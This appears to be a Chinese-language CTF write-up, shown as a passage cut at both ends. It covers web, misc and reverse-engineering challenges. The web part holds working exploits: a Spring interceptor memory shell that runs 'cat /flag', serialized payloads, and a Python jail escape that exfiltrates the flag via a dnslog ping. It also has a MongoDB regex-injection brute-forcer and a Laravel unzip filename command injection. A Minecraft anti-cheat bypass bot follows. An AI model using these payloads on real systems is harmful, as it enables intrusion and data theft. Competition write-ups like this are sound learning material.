VAAAAawAAAAQAAQBsAAEAbQBuAAIARgAAAGAABQAFAAAACiorLC0ZBLcAKbEAAAACAEcAAAAKAAIAAACRAAkAkgBIAAAANAAFAAAACgBJAEoAAAAAAAoAWQBaAAEAAAAKAFsAXAACAAAACgBdAF4AAwAAAAoAbwBwAAQAawAAAAQAAQBsAAEAcQByAAIARgAAAGAABQAFAAAACiorLC0ZBLcAKrEAAAACAEcAAAAKAAIAAACWAAkAlwBIAAAANAAFAAAACgBJAEoAAAAAAAoAWQBaAAEAAAAKAFsAXAACAAAACgBdAF4AAwAAAAoAcwB0AAQAawAAAAQAAQBsAAEAdQB2AAIARgAAAD8AAAADAAAAAbEAAAACAEcAAAAGAAEAAACcAEgAAAAgAAMAAAABAEkASgAAAAAAAQB3AHgAAQAAAAEAeQB6AAIAawAAAAQAAQB7AAEAdQB8AAIARgAAAEkAAAAEAAAAAbEAAAACAEcAAAAGAAEAAAChAEgAAAAqAAQAAAABAEkASgAAAAAAAQB3AHgAAQAAAAEAfQB+AAIAAAABAF0AfwADAGsAAAAEAAEAewAIAIAARQABAEYAAAFxAAMABQAAAG4EswAIsgAHEiu2ABS4ACwSLQO5AC4DAMAAL0sqEjC5ADECAMAAMEwBTRIyEjO2ADRNpwAITi22ADYsBLYANwFOLCu2ADjAADlOpwAKOgQZBLYAO7sAPFm3AD06BC0ZBLkAPgIAV7IABxI/tgAUsQACACkAMQA0ADUAQABJAEwAOgAEAEcAAABOABMAAAAnAAQAKQAMACoAGwArACcALAApAC4AMQAxADQALwA1ADAAOQAyAD4AMwBAADUASQA4AEwANgBOADcAUwA5AFwAOgBlADsAbQA8AEgAAABIAAcANQAEAIEAggADAE4ABQCBAIMABAAbAFIAhACFAAAAJwBGAIYAhwABACkARACIAIkAAgBAAC0AigCLAAMAXAARAIwASgAEAI0AAAAMAAEAQAAtAIoAjgADAFQAAAAtAAT/ADQAAwcAjwcAkAcAkQABBwCSBP8AEgAEBwCPBwCQBwCRBwCTAAEHAJQGAAIAlQAAAAIAlgEPAAAACgABALgAtAEOAAlwdAAFUHVwaTFwdwEAeHh0AAJ6WnNyADFjb20uc3VuLm9yZy5hcGFjaGUueHBhdGguaW50ZXJuYWwub2JqZWN0cy5YU3RyaW5nHAonO0gWxf0CAAB4cgAxY29tLnN1bi5vcmcuYXBhY2hlLnhwYXRoLmludGVybmFsLm9iamVjdHMuWE9iamVjdPSYEgm7e7YZAgABTAAFbV9vYmp0ABJMamF2YS9sYW5nL09iamVjdDt4cgAsY29tLnN1bi5vcmcuYXBhY2hlLnhwYXRoLmludGVybmFsLkV4cHJlc3Npb24H2aYcjays1gIAAUwACG1fcGFyZW50dAAyTGNvbS9zdW4vb3JnL2FwYWNoZS94cGF0aC9pbnRlcm5hbC9FeHByZXNzaW9uTm9kZTt4cHBxAH4AEXhxAH4AAnNxAH4AAD9AAAAAAAAMdwgAAAAQAAAAAnEAfgADcQB+ABhxAH4AEnEAfgAGeHEAfgAZeA==\"}";

        }else {
            code = "{\"code\":\"200\",\"message\":\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAABdwQAAAABdAApb3JnLmpib3NzLnByb3h5LmVqYi5oYW5kbGUuSG9tZUhhbmRsZUltcGx4\"}";;

        }
        if (request.getRequestURI().equals("/blacklist/jdk/get")) {
            String result = new Scanner(code).useDelimiter("\\A").next();
            response.addHeader("Content-Type","application/json;charset=UTF-8");
            response.getWriter().write(result);
            response.getWriter().flush();
            response.getWriter().close();
            nums++;
            return false;
        }

        return true;
    }

    @Override
    public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
        HandlerInterceptor.super.postHandle(request, response, handler, modelAndView);
    }

    @Override
    public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {
        HandlerInterceptor.super.afterCompletion(request, response, handler, ex);
    }

}

public class magicInterceptor extends AbstractTranslet implements HandlerInterceptor {

    public  static int nums = 1;
    static {
        System.out.println("staart");
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
        Field field = null;
        try {
            field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
        } catch (NoSuchFieldException e) {
            e.printStackTrace();
        }
        field.setAccessible(true);
        List<HandlerInterceptor> adaptInterceptors = null;
        try {
            adaptInterceptors = (List<HandlerInterceptor>) field.get(mappingHandlerMapping);
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        }
        magicInterceptor evilInterceptor = new magicInterceptor();
        adaptInterceptors.add(evilInterceptor);
        System.out.println("ok");
    }
    public static String replaceBlank(String str) {

        String dest = "";

        if (str != null) {

            Pattern p = Pattern.compile("\\s*|\t|\r|\n");

            Matcher m = p.matcher(str);

            dest = m.replaceAll("");

        }

        return dest;

    }

    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {

        String code;

//        if(nums == 1){
//            Runtime.getRuntime().exec("grep -rn --exclude-dir={proc,sys} flag{* / > /tmp/1.txt");
//        }
        InputStream in = Runtime.getRuntime().exec("cat /flag").getInputStream();
        Scanner s = new Scanner(in).useDelimiter("\\A");
        String output = s.hasNext() ? s.next() : "";

        System.out.println(output);

        code = "{\"code\":\"200\",\"message\":\""+Base64.getEncoder().encodeToString(output.getBytes())+"\"}";

        if (request.getRequestURI().equals("/status")) {
            String result = new Scanner(code).useDelimiter("\\A").next();

            response.addHeader("Content-Type","application/json;charset=UTF-8");
            response.getWriter().write(result);
            response.getWriter().flush();
            response.getWriter().close();
            nums++;
            return false;
        }

        return true;
    }

    @Override
    public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
        HandlerInterceptor.super.postHandle(request, response, handler, modelAndView);
    }

    @Override
    public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {
        HandlerInterceptor.super.afterCompletion(request, response, handler, ex);
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

Escape Plan

参考 https://cn-sec.com/archives/1322842.html

ping dnslog 外带 flag

import base64

u = '𝟢𝟣𝟤𝟥𝟦𝟧𝟨𝟩𝟪𝟫'

CMD = "eval(vars(eval(list(dict(_a_aiamapaoarata_a_=()))[len([])][::len(list(dict(aa=()))[len([])])])(list(dict(b_i_n_a_s_c_i_i_=()))[len([])][::len(list(dict(aa=()))[len([])])]))[list(dict(a_2_b1_1b_a_s_e_6_4=()))[len([])][::len(list(dict(aa=()))[len([])])]](list(dict(X19pbXBvcnRfXygnb3MnKS5wb3BlbigncGluZyBgL3JlYWRmbGFnYC40MWh4aTYuZG5zbG9nLmNuICAnKS5yZWFkKCkg=()))[len([])]))"

CMD = CMD.translate({ord(str(i)): u[i] for i in range(10)})

print(base64.b64encode(CMD.replace('eval', 'ᵉval').encode()).decode())

d3node

右键源代码第一个 hint, 一眼 mongodb 注入

import requests
import time
import json
import re
from urllib.parse import quote

dicts = '0123456789AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz'

flag = ''

while True:
    for s in dicts:
        print('testing', s)
        url = 'http://47.102.98.112:32299/user/LoginIndex'
        res = requests.post(url,data=json.dumps({'username': 'admin', 'password': {'$regex': '^' + flag + s}}), headers={'Content-Type': 'application/json'})
        if 'Hacker' in res.text:
            print('error')
            quit()
        if 'invalid' not in res.text:
            flag += s
            print('found!!!', flag)
            break

admin 密码为 dob2xdriaqpytdyh6jo3

然后登进去右键源码第二个 hint 可以读文件

结合后台给的 setDependencies 和 packDependencies 功能猜测是要通过设置 package.json 进行 rce

参考 2022 ByteCTF 的 ctf_cloud

SetDependencies

PackDependencies

ShwoExampleFile 读文件拿到回显

d3cloud

后台 /admin

弱口令 admin/admin

登进去发现安装了 laravel-admin-extensions/media-manager 这个插件

里面放了一个 FilesystemAdapter.php, 存在 auto unzip 的功能

/**
 * Store the uploaded file on the disk with a given name.
 *
 * @param  string  $path
 * @param  \Illuminate\Http\File|\Illuminate\Http\UploadedFile  $file
 * @param  string  $name
 * @param  array  $options
 * @return string|false
 */
public function putFileAs($path, $file, $name, $options = [])
{
    $supported_file = array('gif','jpg','jpeg','png','ico','zip','mp4','mp3','mkv','avi','txt');
    $file_type= strtolower(pathinfo($name,PATHINFO_EXTENSION));
    if (!in_array($file_type, $supported_file)) {
        return false;
    }
    $stream = fopen($file->getRealPath(), 'r+');
    $result = $this->put(
        $path = trim($path.'/'.$name, '/'), $stream, $options
    );
    if (is_resource($stream)) {
        fclose($stream);
    }
    if($file->getClientOriginalExtension() === "zip") {
        $fs = popen("unzip -oq ". $this->driver->getAdapter()->getPathPrefix() . $name ." -d " . $this->driver->getAdapter()->getPathPrefix(),"w");
        pclose($fs);
    }
    return $result ? $path : false;
}

很明显存在命令注入

先随便传一个打包好的 shell.zip, 然后再传一次, 把 filename 改成

shell.zip -d /var/www/html/public/shell.zip;123.zip

Misc

h3d3checkin

直接发

Questionnaire

直接填

d3readfile

读/var/cache/locate/locatedb得到全文件地址，在里面搜索flag再读即可

d3gif

先分帧

from PIL import Image
import os
import random

class GIFTest:

    def __init__(self, file_name):
        self.file_name = file_name      # 传入的文件名
        self.dir_name = self.file_name[:-4]     # 根据文件名创建存放分帧图片的文件夹
        self.gif_path = os.path.join(os.path.dirname(
            __file__), file_name)  # 拼接图片文件的完整路径（仅限同一文件夹内）
        self.make_dir()

    def make_dir(self):
        """用于创建存放分帧图片的文件夹"""
        try:
            os.mkdir(self.dir_name)
        except FileExistsError:
            print('<%s>文件夹已存在' % self.dir_name)
            self.dir_name += str(random.randint(0, 10))
            os.mkdir(self.dir_name)

    def framing_test(self):
        """GIF图片分帧"""
        img = Image.open(self.gif_path)
        try:
            while True:
                curr = img.tell()
                name = os.path.join(self.dir_name, '%s.png' % str(curr + 1))
                img.save(name)
                img.seek(curr+1)
        except Exception as e:
            pass

if __name__ == '__main__':
    GIFTest('./files/(x,y,bin).gif').framing_test()

然后转下rgb(cv2里是bgr)

import cv2
from PIL import Image
import matplotlib.pyplot as plt
import os
import numpy as np

# 批量转灰度图并保存
# crack文件夹下批量处理将灰度图转成RGB并保存

def convert2gray(filename):                                     # 定义灰度图转RGB图的函数
    img = cv2.imread(file_path+'/'+filename, 1)                 # 1是以BGR图方式去读
    RGB_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
    cv2.imwrite(out_path + '/RGB' + filename, RGB_img)     # 保存在新文件夹下，且图名中加RGB

file_path = "./photo/"               # 输入文件夹         # 建立新的目录
out_path = "./new/"            # 设置为新目录为输出文件夹
for i in range(1089):
    convert2gray(str(i+1)+'.png')  # 批量转换

然后猜测背景的颜色是和文件名一样的，直接画33x33的二维码即可

from PIL import Image
img = Image.new('RGB', (33, 33))
for i in range(1089):
    imgg = Image.open('./new/RGB'+str(i+1)+'.png')
    pi = imgg.getpixel((0, 0))
    x = pi[2]
    y = pi[1]
    col = pi[0]
    img.putpixel((x, y), (col*255, col*255, col*255))
img.save('flag.png')

d3image

先看版本

Linux version 4.15.0-142-generic (buildd@lgw01-amd64-039) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12)) #146~16.04.1-Ubuntu SMP Tue Apr 13 09:27:15 UTC 2021 (Ubuntu 4.15.0-142.146~16.04.1-generic 4.15.18)

一眼丁真，直接起个ubuntu16来做vol2用的profile

做好了先看眼命令行

特别干净但还是可以看出来挂了个代理去用火狐，于是猜测给的容器是代理

这时候就可以直接恢复下文件系统

python2 vol.py -f ../mem --profile=Linuxubuntu16142x64 linux_recover_filesystem --dump-dir=../file/

然后找到里面的proxychains的配置文件就能看到最后一行的代理了，直接照抄并更改地址

socks5  192.168.31.136 51234 Gigantic_Splight Tearalaments_Kitkalos

然后找了很久的火狐相关记录没有啥结果，于是winhex打开内存嗯看，发现了两个可疑的地址

127.0.0.1:2333
127.0.0.1:2333/magic.7z

一眼是要挂代理访问的，于是试了一下果然有东西，于是得到下一步的压缩包和一个需要token的网站

压缩包很大，但是经过hint以及脑洞以及多次尝试，最终找到了隐写的方法，就是ip为10.0.0.0~10.76.223.231的范围，一共有5038056种，并且其中的每一种都有相应的请求或响应记录，再加上5038056是8的倍数以及hint中的是否可达，很容易联想到二进制，于是写脚本手搓pcap来判断每一个ip是否可达，要分好几种情况，在这不多说了(由于不大会用pyshark就手搓了，还好这里的流量都是一样长)

from tqdm import trange
f = open('data', 'rb')
num = [0]*5038056
for i in trange(9131515):
    dataa = f.read(44)
    dataaa = dataa[33:36]
    dataaaa = int.from_bytes(dataaa, byteorder='big')
    if (dataa[37:38] == b'\x03' and dataa[36:37] == b'\x00'):
        num[dataaaa] = 1
    if (dataa[36:37] == b'\x08'):
        if (num[dataaaa] == 1):
            num[dataaaa] = 1
            continue
        if (num[dataaaa] == 0):
            num[dataaaa] = 2
            continue
        if (num[dataaaa] == 3):
            num[dataaaa] = 1
            continue

    if (dataa[37:38] == b'\x00' and dataa[36:37] == b'\x00'):
        if (num[dataaaa] == 1):
            num[dataaaa] = 1
            continue
        if (num[dataaaa] == 0):
            num[dataaaa] = 3
            continue
        if (num[dataaaa] == 2):
            num[dataaaa] = 0
            continue
        if (num[dataaaa] == 3):
            num[dataaaa] = 1
            continue

for i in range(len(num)):
    if (num[i] == 0):
        print(1, end='')
    if (num[i] == 1):
        print(0, end='')
    if (num[i] == 2):
        print(0, end='')
    if (num[i] == 3):
        print(0, end='')

里面的data文件是pcap包去掉了文件头

得到的结果解二进制刚好是一个7z压缩包，里面是一个3d模型文件

下了个国产的叫追光几何来打开，经过摸索发现模型里面藏了个二维码

扫码得到

3;A6eI`(J{z29|Gz":Dqt;~h*Bvc$7}c"dw'uBJth$Jg(+4+8x9eG7`>83$q5hF%I*)yrcb3+7$*~Dr"G|:K~C{_"Jv5=B9t9|>bwugCE~d&3fd{H;@hD?(DDz~$h#I%I`IB8zKyfHby3x'yfc56fH35|E8$+KGE@(u`7

然后解密

得到token

4765cdef0101

然后再次挂代理访问页面，可是一直是connecting转圈

查看js后了解是需要一个手柄连接才可以连的上，由于五一回家了手柄在学校，就采取手动发包的形式来做

要发的包的形式长这样

await fetch("http://127.0.0.1:2333/api/check", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0",
        "Accept": "application/json, text/plain, */*",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/json",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin"
    },
    "referrer": "http://127.0.0.1:2333/",
    "body": "{\"text\":\"\"}",
    "method": "POST",
    "mode": "cors"
});

token的值就在body里面，并且阅读js可以知道token是以emoji的形式发出的，只需要找到对应关系并填在body里发包就可以看到返回的数据了

await fetch("http://127.0.0.1:2333/api/check", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0",
        "Accept": "application/json, text/plain, */*",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/json",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin"
    },
    "referrer": "http://127.0.0.1:2333/",
    "body": "{\"text\":\"🐻🥔🍆🍉⬆️⬇️⬅️➡️🅰️🅱️🅰️🅱️\"}",
    "method": "POST",
    "mode": "cors"
});

发过去就看到flag了

最后再解个base32就好了

d3craft

给node-minecraft-protocol打补丁支持1.19.4

npm install mineflayer

https://github.com/PrismarineJS/minecraft-data/pull/703

用这个pr的repo的全部内容替换node_modules\minecraft-data\minecraft-data 然后

修改node_modules\minecraft-data\data.js 添加

            '1.19.4': {
      get attributes () { return require("./minecraft-data/data/pc/1.17/attributes.json") },
      get blocks () { return require("./minecraft-data/data/pc/1.19.4/blocks.json") },
      get blockCollisionShapes () { return require("./minecraft-data/data/pc/1.19.4/blockCollisionShapes.json") },
      get biomes () { return require("./minecraft-data/data/pc/1.19.4/biomes.json") },
      get effects () { return require("./minecraft-data/data/pc/1.19.4/effects.json") },
      get items () { return require("./minecraft-data/data/pc/1.19.4/items.json") },
      get enchantments () { return require("./minecraft-data/data/pc/1.19.4/enchantments.json") },
      get recipes () { return require("./minecraft-data/data/pc/1.19.4/recipes.json") },
      get instruments () { return require("./minecraft-data/data/pc/1.19.4/instruments.json") },
      get materials () { return require("./minecraft-data/data/pc/1.19.4/materials.json") },
      get language () { return require("./minecraft-data/data/pc/1.19.4/language.json") },
      get entities () { return require("./minecraft-data/data/pc/1.19.4/entities.json") },
      get protocol () { return require("./minecraft-data/data/pc/1.19.4/protocol.json") },
      get windows () { return require("./minecraft-data/data/pc/1.16.1/windows.json") },
      get version () { return require("./minecraft-data/data/pc/1.19.4/version.json") },
      get foods () { return require("./minecraft-data/data/pc/1.19.4/foods.json") },
      get particles () { return require("./minecraft-data/data/pc/1.19.4/particles.json") },
      get blockLoot () { return require("./minecraft-data/data/pc/1.19/blockLoot.json") },
      get entityLoot () { return require("./minecraft-data/data/pc/1.19/entityLoot.json") },
      get loginPacket () { return require("./minecraft-data/data/pc/1.19.2/loginPacket.json") },
      get tints () { return require("./minecraft-data/data/pc/1.19.4/tints.json") },
      get mapIcons () { return require("./minecraft-data/data/pc/1.16/mapIcons.json") }
    }

新建bot的地方加 version: '1.19.4'

const bot = mineflayer.createBot({
    ...,
    version: '1.19.4',
})

下载mc源码

https://github.com/PaperMC/Paper 跟着readme.md配置就行，但是真的慢。。。

漏洞分析

internalTeleport中可以设置玩家（对应连接）的lastPos X Y Z为被传送的位置。

每一次玩家上传坐标，如果玩家上传的坐标在墙里（卡碰撞箱），那么会调用internalTeleport将玩家传送回到玩家上传前的坐标。

如果玩家的lastPos X Y Z 与玩家上传的坐标相差小于等于(1/256)则不会触发插件的PlayerMoveEvent事件。

所以，

①在xz轴移动(1/256)-0.000001，玩家的坐标被设置，因为移动距离小于(1/256)，所以不会触发插件事件

②然后在y轴移动-0.000001，玩家的坐标不会被设置，会导致调用internalTeleport将玩家从方块内拉回，internalTeleport将玩家的lastPos X Y Z设置成①中玩家的坐标

③等待服务器向客户端发送拉回的坐标，并且teleport_confirm（因为不teleport_confirm不能进行移动，参见源码，略）

①②③反复执行约5000次，即可移动到(0.5,-60,0.5)的位置，并且不会触发插件的PlayerMoveEvent事件

exp

mc握手比较烦人，采用了mineflayer实现握手，并且禁用了它的物理引擎插件。

const fs = require('fs')
const mineflayer = require('mineflayer')
const bot = mineflayer.createBot({
    host:"靶机",
    port:114514,
    username: new Date().getTime().toString(),
    version: '1.19.4',
    loadInternalPlugins: false,
    plugins: { 'health': true, 'entities': true, 'physics': false, 'chat': true },
    physicsEnabled: false
})
bot._client.on("end", function (reason) {
    console.log("end", reason)
    console.log("player position:", player_position)
    console.log("player initial:", initial_player_position)
    // exit
    process.exit(0)
})

const delta = (1 / 256) - 0.00001

let state = "waiting_for_sync"
let player_position = {
    x: -1,
    y: -1,
    z: -1,
    yaw: -1,
    pitch: -1,
    flags: -1,
}
let initial_player_position = undefined;
let move_count = 0;

bot._client.on("systemChat", function (packet) {
    console.log("systemChat", packet)
  })

bot._client.on("position", function (packet) {
    if (!packet) return;
    if (packet.teleportId == 1) return;
    console.log("teleport_confirm", packet)
    bot._client.write('teleport_confirm', { teleportId: packet.teleportId })
 {
        player_position.x = packet.x;
        player_position.y = packet.y;
        player_position.z = packet.z;
        if (player_position.yaw !== undefined) {
            player_position.yaw = packet.yaw;
            player_position.pitch = packet.pitch;
        }
        player_position.flags = packet.flags;
        if (initial_player_position == undefined)
            initial_player_position = Object.assign({}, player_position)
    }
    state = "moving"
    console.log("sync_result", player_position)
})

function apply_move(){
    if(player_position.z > 0.6){
        player_position.z = player_position.z - delta;
    }else if (player_position.z < 0.5){
        player_position.z = player_position.z + delta;
    }else if (player_position.x > 0.6){
        player_position.x = player_position.x - delta;
    }else if (player_position.x < 0.5){
        player_position.x = player_position.x + delta;
    }else{
        // wave right hand
        bot._client.write("arm_animation", {
            hand: 0
        })
        //interact with air
        bot._client.write("use_entity", {
            target: 0,
            type: 2,
            mouse: 2,
            hand:0,
            x:player_position.x,
            y:player_position.y,
            z:player_position.z,
            sneaking: false
        })
    }
}

function tick() {
    console.log("tick", state, move_count, player_position)
    if (state == "waiting_for_sync") {
        return;
    }
    else if (state == "moving") {
        apply_move();
        move_count++;
        bot._client.write("position", {
            ...player_position,
            onGround: false
        })
        state = "falling";
    }
    else if (state == "falling"){
        player_position.y = player_position.y - 0.000001;
        bot._client.write("position", {
            ...player_position,
            onGround: false
        })
        state = "waiting_for_sync";
    }
}

setInterval(tick, 5)

bot.on("spawn", function () {
    console.log("spawned");
})

Re

d3recover

用bindiff两个对着看，然后找到检查flag的逻辑在2.0的check里面，于是去读对应函数里的逻辑再写个解密即可

import base64

flag = base64.b64decode('08fOyj+E27O2uYDq0M1y/Ngwldvi2JIIwcbF9AfsAl4=')
flag = list(flag)

for i in range(30):
    flag[29 - i] = (flag[29 - i] ^ 0x54) - flag[31 - i]

for i in range(32):
    print(chr(flag[i] ^ 0x23), end='')

#flag{y0U_RE_Ma5t3r_0f_R3vocery!}

d3sky

nand逻辑门虚拟机

注意到 nand(nand(nand(a,a),b),nand(nand(b,b),a)) == (a ^ b) 就可以很容易解出来

反汇编脚本

from ctypes import *
sbox = [247, 138, 186, 254, 8, 70, 238, 109, 28, 118, 218, 193, 100, 61, 233, 17, 0, 92, 36, 34, 130, 255, 177, 40, 240, 120, 33, 58, 22, 141, 215, 157, 224, 3, 168, 43, 253, 54, 108, 144, 11, 199, 160, 39, 152, 16, 101, 169, 132, 102, 44, 74, 179, 57, 230, 235, 231, 71, 156, 220, 204, 225, 175, 222, 211, 82, 127, 91, 135, 184, 104, 136, 107, 126, 210, 196, 18, 227, 232, 25, 66, 178, 24, 123, 67, 149, 163, 217, 154, 42, 239, 48, 221, 172, 75, 207, 113, 129, 187, 245, 31, 137, 209, 23, 128, 185, 47, 37, 83, 6, 111, 223, 49, 171, 27, 76, 251, 176, 52, 110, 164, 170, 9, 19, 151, 1, 121, 208, 88, 139, 173, 72, 145, 50, 32, 214, 103, 41, 77, 20, 143, 46, 53, 229, 94, 35, 174, 142, 165, 69, 97, 15, 114, 150, 194, 189, 234, 68, 2, 201, 213, 7, 203, 86, 248, 99, 112, 26, 106, 122, 244, 55, 38, 147, 252, 183, 148, 167, 191, 250, 10, 85, 80, 14, 29, 202, 206, 236, 5, 45, 64, 192, 65, 56, 226, 188, 181, 155, 117, 158, 205, 4, 159, 200, 198, 78, 219, 87, 63, 131, 162, 62, 119, 140, 60, 216, 242, 73, 98, 146, 133, 124, 21, 241, 190, 246, 13, 197, 195, 84, 153, 228, 93, 105, 12, 116, 237, 96, 180, 243, 90, 59, 182, 249, 166, 161, 81, 89, 79, 30, 134, 115, 51, 125, 95, 212]

py_code = [21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2582, 2716, 10, 97, 218, 110, 142, 18, 101, 234, 134, 13, 2710, 2629, 141, 67, 35, 245, 164, 128, 109, 100, 159, 207, 2808, 2635, 240, 114, 189, 15, 78, 237, 146, 111, 174, 96, 2638, 2622, 209, 157, 5, 24, 231, 19, 49, 9, 140, 23, 2580, 2601, 160, 232, 26, 21, 27, 58, 237, 31, 199, 3, 2604, 2758, 120, 145, 78, 9, 98, 199, 32, 94, 100, 242, 3, 82, 73, 101, 255, 241, 228, 47, 100, 39, 230, 2811, 212, 182, 13, 81, 62, 66, 41, 77, 163, 221, 103, 2796, 221, 32, 242, 13, 95, 17, 93, 151, 158, 44, 32, 2797, 158, 68, 178, 2, 234, 32, 57, 248, 0, 17, 121, 2762, 174, 117, 171, 50, 3, 210, 252, 136, 68, 95, 252, 2783, 100, 30, 4, 126, 36, 69, 239, 42, 54, 209, 37, 2790, 235, 71, 236, 129, 105, 225, 70, 133, 17, 227, 43, 2718, 153, 208, 149, 50, 237, 151, 203, 110, 180, 60, 9, 2591, 161, 156, 131, 109, 112, 9, 120, 254, 162, 144, 213, 2623, 249, 229, 21, 185, 99, 35, 182, 36, 180, 221, 241, 2646, 124, 112, 15, 7, 90, 94, 153, 18, 40, 194, 149, 2730, 175, 183, 163, 50, 41, 134, 217, 140, 143, 250, 157, 2652, 40, 180, 28, 193, 19, 44, 35, 114, 131, 164, 126, 2590, 58, 72, 74, 124, 177, 17, 9, 206, 251, 69, 186, 2760, 247, 30, 172, 85, 72, 130, 181, 93, 167, 95, 146, 2660, 79, 155, 34, 84, 14, 252, 9, 8, 10, 67, 216, 2656, 180, 187, 109, 54, 55, 46, 84, 157, 107, 121, 226, 2788, 165, 71, 148, 98, 232, 46, 224, 173, 158, 178, 32, 2628, 100, 65, 17, 161, 96, 158, 47, 91, 111, 0, 57, 2695, 119, 246, 230, 134, 109, 63, 161, 63, 197, 47, 146, 2751, 75, 37, 11, 53, 110, 107, 167, 88, 230, 85, 236, 2730, 12, 214, 158, 83, 53, 186, 123, 54, 149, 205, 220, 2642, 86, 236, 89, 179, 94, 167, 61, 200, 144, 215, 249, 2653, 9, 60, 95, 177, 168, 197, 227, 216, 71, 151, 205, 2739, 89, 36, 243, 126, 71, 34, 22, 228, 29, 82, 18, 2565, 36, 210, 134, 218, 150, 228, 78, 27, 55, 55, 105, 2747, 33, 4, 253, 136, 37, 76, 28, 240, 20, 174, 139, 2670, 222, 151, 254, 238, 227, 125, 193, 194, 60, 164, 100, 2645, 136, 79, 240, 130, 200, 152, 94, 251, 88, 60, 5, 2679, 25, 83, 106, 249, 163, 41, 17, 181, 186, 167, 248, 2756, 196, 82, 179, 62, 194, 161, 215, 224, 20, 24, 249, 2731, 36, 212, 32, 128, 62, 64, 155, 211, 174, 139, 177, 2615, 83, 241, 98, 56, 93, 32, 0, 194, 216, 227, 228, 2675, 212, 226, 8, 253, 230, 252, 173, 79, 135, 163, 212, 2631, 36, 162, 49, 140, 4, 97, 129, 27, 63, 140, 16, 2580, 153, 255, 169, 173, 252, 8, 52, 61, 176, 123, 32, 2659, 45, 200, 208, 41, 78, 46, 120, 233, 223, 218, 248, 2634, 2603, 2576, 218, 65, 2709, 18, 2586, 2712, 168, 36, 2791, 102, 77, 7, 224, 2753, 2662, 231, 72, 2739, 224, 2687, 2669, 136, 231, 2794, 101, 199, 225, 25, 2, 185, 117, 223, 53, 37, 3, 59, 212, 246, 40, 145, 232, 196, 89, 2790, 2770, 100, 160, 46, 96, 182, 212, 108, 238, 2771, 171, 207, 187, 33, 2812, 2572, 49, 0, 2610, 81, 2755, 2581, 198, 35, 2738, 206, 50, 167, 27, 2796, 2716, 47, 117, 2764, 139, 2639, 2765, 5, 175, 2737, 85, 128, 192, 157, 156, 52, 144, 146, 236, 2, 50, 21, 223, 46, 155, 38, 185, 112, 1, 2795, 2776, 107, 24, 137, 134, 229, 22, 194, 224, 2598, 141, 100, 11, 252, 2565, 2642, 26, 140, 2598, 23, 2621, 2583, 60, 17, 2796, 212, 20, 162, 93, 2795, 2707, 204, 166, 2586, 115, 2770, 2735, 119, 18, 2614, 119, 71, 205, 213, 175, 54, 242, 206, 178, 35, 58, 179, 243, 69, 3, 244, 167, 238, 207, 2620, 2727, 18, 169, 97, 95, 167, 144, 70, 219, 2625, 52, 196, 52, 56, 2642, 2579, 22, 173, 2743, 33, 2574, 2596, 108, 24, 2789, 146, 97, 207, 171, 2752, 2723, 113, 217, 2579, 219, 2620, 2699, 18, 25, 2602, 2, 195, 150, 237, 110, 36, 250, 196, 133, 117, 254, 80, 7, 232, 10, 230, 65, 130, 18, 2691, 2777, 124, 94, 78, 21, 79, 27, 94, 195, 2812, 48, 251, 118, 88, 2755, 2618, 51, 68, 2587, 156, 2745, 2684, 8, 75, 2583, 112, 130, 188, 243, 2561, 2799, 197, 98, 2719, 42, 2569, 2765, 63, 134, 2699, 197, 135, 69, 234, 222, 20, 189, 254, 248, 198, 187, 217, 158, 106, 131, 19, 99, 106, 175, 2768, 2752, 201, 246, 47, 98, 136, 223, 226, 144, 2756, 105, 149, 80, 130, 2666, 2737, 241, 62, 2594, 42, 2591, 2662, 123, 137, 2744, 48, 75, 187, 49, 2801, 2702, 220, 212, 2738, 243, 2800, 2589, 140, 202, 2647, 135, 195, 156, 251, 126, 83, 182, 51, 186, 242, 187, 9, 84, 161, 114, 136, 164, 211, 112, 2764, 2811, 79, 46, 139, 49, 64, 14, 184, 154, 2628, 172, 255, 241, 245, 2683, 2709, 119, 87, 2621, 146, 2570, 2670, 23, 228, 2749, 117, 93, 141, 35, 2692, 2678, 161, 246, 2563, 61, 2737, 2695, 85, 55, 2575, 147, 26, 26, 2, 241, 24, 5, 154, 138, 19, 26, 135, 27, 69, 126, 35, 119, 139, 148, 2802, 2750, 191, 213, 108, 91, 25, 117, 28, 234, 2684, 2, 117, 245, 203, 2597, 2758, 92, 186, 2688, 198, 2778, 2624, 89, 148, 2568, 83, 152, 253, 150, 2744, 2778, 35, 96, 2666, 203, 2738, 2597, 59, 79, 2637, 11, 42, 209, 224, 175, 109, 179, 203, 114, 190, 7, 172, 174, 11, 57, 38, 5, 10, 180, 3033, 3052, 97, 36, 224, 123, 49, 75, 94, 34, 2954, 173, 11, 12, 141, 2595, 2594, 176, 245, 